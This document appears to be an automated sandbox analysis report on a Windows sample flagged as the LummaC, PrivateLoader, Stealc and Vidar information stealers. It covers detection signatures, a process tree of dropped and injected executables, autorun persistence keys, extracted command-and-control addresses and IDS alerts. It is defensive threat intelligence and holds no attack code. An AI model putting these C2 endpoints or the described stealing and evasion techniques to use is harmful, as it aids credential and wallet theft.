Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524021
MD5:ca9bae7d8fa56f97bb596d225e1469c3
SHA1:3df5b3d39a47168aac776137582cbbe6a94a9c22
SHA256:8ef212f5c726e72277b21aed2397390296cb4ce431b2270808925a22852fdbe9
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, PrivateLoader, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PrivateLoader
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7060 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CA9BAE7D8FA56F97BB596D225E1469C3)
    • LKMService.exe (PID: 4340 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: CA9BAE7D8FA56F97BB596D225E1469C3)
      • GoogleUpdater.exe (PID: 5660 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker MD5: CA9BAE7D8FA56F97BB596D225E1469C3)
      • f98ae5e6665140c7bc7a10ef5c598fcb.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe" MD5: 34EC7A5A9154386680A400B65CADA6CB)
        • conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • ZNiWLZA4sT3dAjz_lF65fVs6.exe (PID: 3468 cmdline: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe MD5: 022CC85ED0F56A3F3E8AEC4AE3B80A71)
            • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • RegAsm.exe (PID: 2672 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
            • RegAsm.exe (PID: 2632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • cmd.exe (PID: 4916 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCGHCGIIDGD.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • userCGHCGIIDGD.exe (PID: 2612 cmdline: "C:\Users\userCGHCGIIDGD.exe" MD5: 237AF39F8B579AAD0205F6174BB96239)
                  • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • RegAsm.exe (PID: 6208 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                    • FIEHIIIJDA.exe (PID: 6008 cmdline: "C:\ProgramData\FIEHIIIJDA.exe" MD5: C7E7CFC3ED17AEF6C67C265389593EE3)
                      • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • RegAsm.exe (PID: 2496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                    • JJJEGCGDGH.exe (PID: 4816 cmdline: "C:\ProgramData\JJJEGCGDGH.exe" MD5: 237AF39F8B579AAD0205F6174BB96239)
                      • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • RegAsm.exe (PID: 5360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                      • RegAsm.exe (PID: 340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                    • EBAEBFIIEC.exe (PID: 5868 cmdline: "C:\ProgramData\EBAEBFIIEC.exe" MD5: 022CC85ED0F56A3F3E8AEC4AE3B80A71)
                      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • RegAsm.exe (PID: 400 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                      • RegAsm.exe (PID: 7068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • cmd.exe (PID: 3660 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userJEHDHIEGII.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • userJEHDHIEGII.exe (PID: 2056 cmdline: "C:\Users\userJEHDHIEGII.exe" MD5: C7E7CFC3ED17AEF6C67C265389593EE3)
                  • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • RegAsm.exe (PID: 2496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                  • RegAsm.exe (PID: 5440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                  • RegAsm.exe (PID: 6324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                  • RegAsm.exe (PID: 6904 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • E4aR4O9hOTF5WJfvKNpcVCp8.exe (PID: 6812 cmdline: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe MD5: 237AF39F8B579AAD0205F6174BB96239)
            • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • RegAsm.exe (PID: 5316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • LKMService.exe (PID: 4016 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: CA9BAE7D8FA56F97BB596D225E1469C3)
    • WerFault.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 12268 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • GoogleUpdater.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" MD5: CA9BAE7D8FA56F97BB596D225E1469C3)
    • WerFault.exe (PID: 404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 71444 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • LKMService.exe (PID: 6308 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" MD5: CA9BAE7D8FA56F97BB596D225E1469C3)
    • WerFault.exe (PID: 6280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6308 -s 81740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • GoogleUpdater.exe (PID: 6320 cmdline: "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" MD5: CA9BAE7D8FA56F97BB596D225E1469C3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}

Threatname: LummaC

{"C2 url": ["snarlypagowo.site", "absorptioniw.site", "mysterisop.site", "chorusarorp.site", "soldiefieop.site", "questionsmw.stor", "abnomalrkmu.site", "treatynreit.site"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "8b4d47586874b08947203f03e4db3962"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            00000013.00000002.2779012779.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              00000013.00000002.2783474686.000000000147A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                00000023.00000002.2984201099.0000000000582000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 22 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  13.2.ZNiWLZA4sT3dAjz_lF65fVs6.exe.4115570.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    35.2.RegAsm.exe.400000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      35.2.RegAsm.exe.400000.1.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                        19.2.RegAsm.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                          13.2.ZNiWLZA4sT3dAjz_lF65fVs6.exe.4115570.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                            Click to see the 7 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: New RUN Key Pointing to Suspicious Folder
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LKMService_f5ad86b5dd8e489690bbd1068a1566bc
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LKMService_f5ad86b5dd8e489690bbd1068a1566bc
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7060, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7f7765716ecd48468fd42866f53e185b.lnk

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:22.779200+020020287653Unknown Traffic192.168.2.65852249.12.197.9443TCP
                            2024-10-02T14:43:24.072708+020020287653Unknown Traffic192.168.2.65852749.12.197.9443TCP
                            2024-10-02T14:43:25.431860+020020287653Unknown Traffic192.168.2.65853249.12.197.9443TCP
                            2024-10-02T14:43:26.936355+020020287653Unknown Traffic192.168.2.65853549.12.197.9443TCP
                            2024-10-02T14:43:28.336885+020020287653Unknown Traffic192.168.2.65853949.12.197.9443TCP
                            2024-10-02T14:43:29.831403+020020287653Unknown Traffic192.168.2.65854249.12.197.9443TCP
                            2024-10-02T14:43:30.839422+020020287653Unknown Traffic192.168.2.65854449.12.197.9443TCP
                            2024-10-02T14:43:33.919258+020020287653Unknown Traffic192.168.2.65854549.12.197.9443TCP
                            2024-10-02T14:43:35.049419+020020287653Unknown Traffic192.168.2.65854649.12.197.9443TCP
                            2024-10-02T14:43:36.154713+020020287653Unknown Traffic192.168.2.65854749.12.197.9443TCP
                            2024-10-02T14:43:37.649493+020020287653Unknown Traffic192.168.2.65854849.12.197.9443TCP
                            2024-10-02T14:43:39.381876+020020287653Unknown Traffic192.168.2.65854949.12.197.9443TCP
                            2024-10-02T14:43:41.333638+020020287653Unknown Traffic192.168.2.65855149.12.197.9443TCP
                            2024-10-02T14:43:42.854596+020020287653Unknown Traffic192.168.2.65855249.12.197.9443TCP
                            2024-10-02T14:43:44.328521+020020287653Unknown Traffic192.168.2.65855349.12.197.9443TCP
                            2024-10-02T14:43:46.069067+020020287653Unknown Traffic192.168.2.65855449.12.197.9443TCP
                            2024-10-02T14:43:49.012798+020020287653Unknown Traffic192.168.2.65855549.12.197.9443TCP
                            2024-10-02T14:43:50.646052+020020287653Unknown Traffic192.168.2.65855649.12.197.9443TCP
                            2024-10-02T14:43:51.953225+020020287653Unknown Traffic192.168.2.65855749.12.197.9443TCP
                            2024-10-02T14:43:53.623999+020020287653Unknown Traffic192.168.2.65855849.12.197.9443TCP
                            2024-10-02T14:43:55.913375+020020287653Unknown Traffic192.168.2.65856049.12.197.9443TCP
                            2024-10-02T14:43:58.252697+020020287653Unknown Traffic192.168.2.65856549.12.197.9443TCP
                            2024-10-02T14:44:01.167408+020020287653Unknown Traffic192.168.2.65857149.12.197.9443TCP
                            2024-10-02T14:44:03.511798+020020287653Unknown Traffic192.168.2.65857449.12.197.9443TCP
                            2024-10-02T14:44:06.703468+020020287653Unknown Traffic192.168.2.65857849.12.197.9443TCP
                            2024-10-02T14:44:08.802521+020020287653Unknown Traffic192.168.2.65858149.12.197.9443TCP
                            2024-10-02T14:44:14.413954+020020287653Unknown Traffic192.168.2.65858749.12.197.9443TCP
                            2024-10-02T14:44:15.702613+020020287653Unknown Traffic192.168.2.65858949.12.197.9443TCP
                            2024-10-02T14:44:17.058405+020020287653Unknown Traffic192.168.2.65859149.12.197.9443TCP
                            2024-10-02T14:44:18.714019+020020287653Unknown Traffic192.168.2.65859249.12.197.9443TCP
                            2024-10-02T14:44:20.158914+020020287653Unknown Traffic192.168.2.65859449.12.197.9443TCP
                            2024-10-02T14:44:25.001804+020020287653Unknown Traffic192.168.2.65859749.12.197.9443TCP
                            2024-10-02T14:44:26.018339+020020287653Unknown Traffic192.168.2.65859849.12.197.9443TCP
                            2024-10-02T14:44:29.905746+020020287653Unknown Traffic192.168.2.65860249.12.197.9443TCP
                            2024-10-02T14:44:44.631461+020020287653Unknown Traffic192.168.2.65862049.12.197.9443TCP
                            2024-10-02T14:44:44.663437+020020287653Unknown Traffic192.168.2.65862149.12.197.9443TCP
                            2024-10-02T14:44:45.947908+020020287653Unknown Traffic192.168.2.65862249.12.197.9443TCP
                            2024-10-02T14:44:45.948384+020020287653Unknown Traffic192.168.2.65862349.12.197.9443TCP
                            2024-10-02T14:44:47.296767+020020287653Unknown Traffic192.168.2.65862549.12.197.9443TCP
                            2024-10-02T14:44:47.297352+020020287653Unknown Traffic192.168.2.65862449.12.197.9443TCP
                            2024-10-02T14:44:48.682695+020020287653Unknown Traffic192.168.2.65862949.12.197.9443TCP
                            2024-10-02T14:44:48.685174+020020287653Unknown Traffic192.168.2.65862849.12.197.9443TCP
                            2024-10-02T14:44:50.055117+020020287653Unknown Traffic192.168.2.65863349.12.197.9443TCP
                            2024-10-02T14:44:50.056338+020020287653Unknown Traffic192.168.2.65863249.12.197.9443TCP
                            2024-10-02T14:44:51.467694+020020287653Unknown Traffic192.168.2.65863549.12.197.9443TCP
                            2024-10-02T14:44:51.526239+020020287653Unknown Traffic192.168.2.65863649.12.197.9443TCP
                            2024-10-02T14:44:52.474518+020020287653Unknown Traffic192.168.2.65863849.12.197.9443TCP
                            2024-10-02T14:44:52.530306+020020287653Unknown Traffic192.168.2.65863949.12.197.9443TCP
                            2024-10-02T14:44:56.449692+020020287653Unknown Traffic192.168.2.65864549.12.197.9443TCP
                            2024-10-02T14:44:56.464935+020020287653Unknown Traffic192.168.2.65864649.12.197.9443TCP
                            2024-10-02T14:44:57.128378+020020287653Unknown Traffic192.168.2.65864749.12.197.9443TCP
                            2024-10-02T14:44:57.498056+020020287653Unknown Traffic192.168.2.65864849.12.197.9443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:22.072689+020020546531A Network Trojan was detected192.168.2.658521172.67.208.141443TCP
                            2024-10-02T14:43:23.195875+020020546531A Network Trojan was detected192.168.2.658524188.114.97.3443TCP
                            2024-10-02T14:43:24.146207+020020546531A Network Trojan was detected192.168.2.658526104.21.56.150443TCP
                            2024-10-02T14:43:25.224401+020020546531A Network Trojan was detected192.168.2.658530172.67.184.196443TCP
                            2024-10-02T14:43:26.251833+020020546531A Network Trojan was detected192.168.2.658533104.21.18.193443TCP
                            2024-10-02T14:43:27.270662+020020546531A Network Trojan was detected192.168.2.658536172.67.195.67443TCP
                            2024-10-02T14:43:28.262517+020020546531A Network Trojan was detected192.168.2.658538104.21.17.174443TCP
                            2024-10-02T14:43:30.681564+020020546531A Network Trojan was detected192.168.2.658543104.21.16.12443TCP
                            2024-10-02T14:44:03.114778+020020546531A Network Trojan was detected192.168.2.658573172.67.208.141443TCP
                            2024-10-02T14:44:04.230142+020020546531A Network Trojan was detected192.168.2.658575188.114.97.3443TCP
                            2024-10-02T14:44:05.356373+020020546531A Network Trojan was detected192.168.2.658576104.21.56.150443TCP
                            2024-10-02T14:44:06.702953+020020546531A Network Trojan was detected192.168.2.658577172.67.184.196443TCP
                            2024-10-02T14:44:08.626474+020020546531A Network Trojan was detected192.168.2.658579104.21.18.193443TCP
                            2024-10-02T14:44:09.653035+020020546531A Network Trojan was detected192.168.2.658582172.67.195.67443TCP
                            2024-10-02T14:44:11.020278+020020546531A Network Trojan was detected192.168.2.658583104.21.17.174443TCP
                            2024-10-02T14:44:24.861948+020020546531A Network Trojan was detected192.168.2.658595172.67.208.141443TCP
                            2024-10-02T14:44:26.463660+020020546531A Network Trojan was detected192.168.2.658599188.114.97.3443TCP
                            2024-10-02T14:44:27.461947+020020546531A Network Trojan was detected192.168.2.658600104.21.56.150443TCP
                            2024-10-02T14:44:29.947201+020020546531A Network Trojan was detected192.168.2.658601172.67.184.196443TCP
                            2024-10-02T14:44:31.112798+020020546531A Network Trojan was detected192.168.2.658605104.21.18.193443TCP
                            2024-10-02T14:44:32.131546+020020546531A Network Trojan was detected192.168.2.658607172.67.195.67443TCP
                            2024-10-02T14:44:33.135375+020020546531A Network Trojan was detected192.168.2.658611104.21.17.174443TCP
                            2024-10-02T14:44:35.668995+020020546531A Network Trojan was detected192.168.2.658617104.21.16.12443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:22.072689+020020498361A Network Trojan was detected192.168.2.658521172.67.208.141443TCP
                            2024-10-02T14:43:23.195875+020020498361A Network Trojan was detected192.168.2.658524188.114.97.3443TCP
                            2024-10-02T14:43:24.146207+020020498361A Network Trojan was detected192.168.2.658526104.21.56.150443TCP
                            2024-10-02T14:43:25.224401+020020498361A Network Trojan was detected192.168.2.658530172.67.184.196443TCP
                            2024-10-02T14:43:26.251833+020020498361A Network Trojan was detected192.168.2.658533104.21.18.193443TCP
                            2024-10-02T14:43:27.270662+020020498361A Network Trojan was detected192.168.2.658536172.67.195.67443TCP
                            2024-10-02T14:43:28.262517+020020498361A Network Trojan was detected192.168.2.658538104.21.17.174443TCP
                            2024-10-02T14:43:30.681564+020020498361A Network Trojan was detected192.168.2.658543104.21.16.12443TCP
                            2024-10-02T14:44:03.114778+020020498361A Network Trojan was detected192.168.2.658573172.67.208.141443TCP
                            2024-10-02T14:44:04.230142+020020498361A Network Trojan was detected192.168.2.658575188.114.97.3443TCP
                            2024-10-02T14:44:05.356373+020020498361A Network Trojan was detected192.168.2.658576104.21.56.150443TCP
                            2024-10-02T14:44:06.702953+020020498361A Network Trojan was detected192.168.2.658577172.67.184.196443TCP
                            2024-10-02T14:44:08.626474+020020498361A Network Trojan was detected192.168.2.658579104.21.18.193443TCP
                            2024-10-02T14:44:09.653035+020020498361A Network Trojan was detected192.168.2.658582172.67.195.67443TCP
                            2024-10-02T14:44:11.020278+020020498361A Network Trojan was detected192.168.2.658583104.21.17.174443TCP
                            2024-10-02T14:44:24.861948+020020498361A Network Trojan was detected192.168.2.658595172.67.208.141443TCP
                            2024-10-02T14:44:26.463660+020020498361A Network Trojan was detected192.168.2.658599188.114.97.3443TCP
                            2024-10-02T14:44:27.461947+020020498361A Network Trojan was detected192.168.2.658600104.21.56.150443TCP
                            2024-10-02T14:44:29.947201+020020498361A Network Trojan was detected192.168.2.658601172.67.184.196443TCP
                            2024-10-02T14:44:31.112798+020020498361A Network Trojan was detected192.168.2.658605104.21.18.193443TCP
                            2024-10-02T14:44:32.131546+020020498361A Network Trojan was detected192.168.2.658607172.67.195.67443TCP
                            2024-10-02T14:44:33.135375+020020498361A Network Trojan was detected192.168.2.658611104.21.17.174443TCP
                            2024-10-02T14:44:35.668995+020020498361A Network Trojan was detected192.168.2.658617104.21.16.12443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:44:10.960379+020020544951A Network Trojan was detected192.168.2.65858445.132.206.25180TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:06.028082+020020442451Malware Command and Control Activity Detected46.8.231.10980192.168.2.658515TCP
                            2024-10-02T14:44:09.330593+020020442451Malware Command and Control Activity Detected46.8.231.10980192.168.2.658580TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:06.002213+020020442441Malware Command and Control Activity Detected192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:44:09.279456+020020442441Malware Command and Control Activity Detected192.168.2.65858046.8.231.10980TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:06.202615+020020442461Malware Command and Control Activity Detected192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:44:09.504186+020020442461Malware Command and Control Activity Detected192.168.2.65858046.8.231.10980TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:06.710249+020020442481Malware Command and Control Activity Detected192.168.2.65851546.8.231.10980TCP
                            2024-10-02T14:44:10.424557+020020442481Malware Command and Control Activity Detected192.168.2.65858046.8.231.10980TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-02T14:43:06.224077+020020442471Malware Command and Control Activity Detected46.8.231.10980192.168.2.658515TCP
                            2024-10-02T14:43:27.648630+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.658535TCP
                            2024-10-02T14:44:09.921297+020020442471Malware Command and Control Activity Detected46.8.231.10980192.168.2.658580TCP
                            2024-10-02T14:44:19.412031+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.658592TCP
                            2024-10-02T14:44:49.377395+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.658629TCP
